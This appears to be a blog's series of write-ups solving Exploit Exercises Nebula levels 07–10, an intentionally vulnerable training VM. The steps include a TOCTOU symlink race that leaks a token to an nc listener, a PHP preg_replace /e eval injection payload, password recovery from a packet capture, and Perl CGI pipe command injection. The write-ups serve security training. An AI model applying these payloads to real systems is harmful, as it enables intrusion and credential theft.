Exploit Exercises Nebula — level10

Ah, race condition at last!

After initial reading we can quickly conclude: it’s a standard TOCTOU vulnerability (which also is clearly mentioned in access() man page). Apart from that we need to note that token is sent over network so we have to receive it somehow (nc for the president!).

First things first we will run nc in an infinite loop on our host machine:

host$ while true ; do nc -l 18211 ; done

After that nc will listen on port 18211 and not terminate after receiving each message from level10.

Back to Nebula VM — we need to have two running terminals.

On the first terminal we execute the following command:

vm$ while true ; do ln -s msg lnk && rm lnk && ln -s /home/flag10/token lnk && rm lnk ; done

Which creates dangling symlink.

On the second terminal we execute:

vm$ while true ; do /home/flag10/flag10 /tmp/lnk ; done

Which tries executing /home/flag10/flag10 in an infinite loop with input file as /tmp/lnk (which is our dangling symlink).

After couple of iterations you will see proper key on your host’s nc instance, from here on you only need to do su flag10 with the token as password.

level10@nebula:/tmp$ su flag10
sh-4.2$ /bin/getflag
You have successfully executed getflag on a target account


Exploit Exercises Nebula — level09

Well, I must admit that this time all was new to me. Let’s begin!

After initial parsing of the provided PHP script we can gather basic understanding of the logic along with some useful hints (oddly looking $use_me variable, regular expressions, and this whole preg_replace() function are most important).

The script works as follows: You provide the file which it tries to open, parse and print. If we want to hit spam() function we need to provide proper input, which looks like [email foo@bar.com]:

$ cat ~/pwn.txt
[email foo@bar.com]
$ ./flag09 ~/pwn.txt barfoo
foo AT bar dot com

Now, onto the vulnerability.

If you google preg_replace() then one of the first hits is this, nothing special but we can understand a little bit better how to properly use this function.

Now, I didn’t have much experience in regular expressions so I read couple of tutorials but the one thing that did struck me was this "/(\[email (.*)\])/e" regexp, to be specific the letter "e" after slash. I did not stumbled upon this in any tutorial so I, again, googled it. Lo and behold this is what I found.

So, we already know the core issue here. We only need to connect the dots to craft an exploit.

From the above document and initial hints we do know that the malicious line in ~/pwn.txt needs to look like [email {${eval($use_me)}}]. We will use $use_me variable (that comes from the second argument of our C wrapper) to provide arbitrary PHP code for eval(). And that should suffice:

$ cat ~/pwn.txt
[email {${eval($use_me)}}]
$ ./flag09 ~/pwn.txt "system(\"/bin/getflag\");"
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: in /home/flag09/flag09.php(15) : regexp code on line 1

Another one bites the dust.

Exploit Exercises Nebula — level08

The initial hint isn’t very useful, that being said let’s jump straight into /home/flag08:

$ cd /home/flag08
$ ls

Ok, pcap, so we have to deal with network dump.

Upon executing tcpdump -qns 0 -A -r capture.pcap you’ll receive quite readable output but alas I couldn’t figure this out with only tcpdump.

Here I should probably mention that I cheated in this challenge, namely I did install additional package for analysing network dumps – tcpick.

With tcpick it was really quick.

$ tcpick -yP -C -r capture.pcap

Login incorrect

So we see characters typed as password. If you just try to type them after su flag08 it will fail, however it’s easy to see why: “.” characters between strings are backspaces so valid password is “backd00Rmate”.

$ su flag08
sh-4.2$ /bin/getflag
You have successfully executed getflag on a target account

Lastly I would be glad if anyone could enlighten me how to solve this challenge with tcpdump.

Exploit Exercises Nebula — level07

This one was a little bit tricky since it’s specific to Perl. However I did remember about this and upon refreshing my memory on the topic it was matter of seconds.

To play with this level just navigate to the IP of your VM at port 7007 (via provided thttpd.conf; in my case

My first thought was to try using ";" to break ping command:;ls

But the result was:

PING localhost ( 56(84) bytes of data.
64 bytes from localhost ( icmp_req=1 ttl=64 time=0.063 ms
64 bytes from localhost ( icmp_req=2 ttl=64 time=0.074 ms
64 bytes from localhost ( icmp_req=3 ttl=64 time=0.148 ms

--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.063/0.095/0.148/0.037 ms

So clearly it didn’t work as I planned. Then I was trying to remind myself anything specific about Perl CGI scripts and I did that successfully (vide link from above). After quick refresh I already knew the answer. The pipes, the pipes!| /bin/getflag

And as you may expect it did work:

You have successfully executed getflag on a target account

On to the next one, gents!